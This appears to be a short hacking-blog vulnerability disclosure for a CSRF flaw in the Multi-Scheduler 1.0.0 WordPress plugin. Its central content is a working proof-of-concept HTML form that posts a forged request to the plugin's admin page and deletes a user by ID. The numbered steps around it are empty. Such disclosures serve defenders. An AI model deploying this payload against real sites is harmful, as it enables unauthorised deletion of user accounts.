The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.
Step -1
Step -2
Step -3
Step -4
<form action="http://192.168.0.104:8081/wp-admin/admin.php?page=msbdt_professional" method="POST">
<input type="hidden" name="pro_delete_id" value="1" />
<input type="hidden" name="professional_delete" value="Delete" />
<input type="submit" value="Submit request" />
</form>
Step -5
Step -6
BOOM 🙂 !! User will be deleted.
The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…
Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…
Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
This website uses cookies.
View Comments
I'm amazed, I must say. Rarely do I come across a blog that's both educative and amusing, and without
a doubt, you have hit the nail on the head. The issue is something
which too few people are speaking intelligently about.
I'm very happy that I found this during my hunt for something regarding this.
thanks a lot